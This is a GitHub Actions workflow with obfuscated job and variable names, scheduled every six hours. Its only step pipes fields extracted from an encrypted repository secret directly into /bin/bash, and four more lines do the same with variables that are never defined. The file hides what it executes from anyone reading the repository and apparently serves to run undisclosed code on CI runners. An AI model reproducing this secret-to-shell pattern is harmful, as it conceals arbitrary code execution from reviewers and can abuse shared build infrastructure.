name: guoqingpao3456
on:
  workflow_dispatch:
  schedule:
    - cron: '38 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: guoqingpao3456
        env:
          nef4750: ${{ secrets.nef4750 }}
        run: |
          echo $nef4750 | jq -r .emrv01 | /bin/bash
          echo $w8794 | jq -r .bulc3 | /bin/bash
          echo $orpp1 | jq -r .jsvxw216 | /bin/bash
          echo $eocb8202 | jq -r .huc826 | /bin/bash
          echo $c0 | jq -r .racd2 | /bin/bash

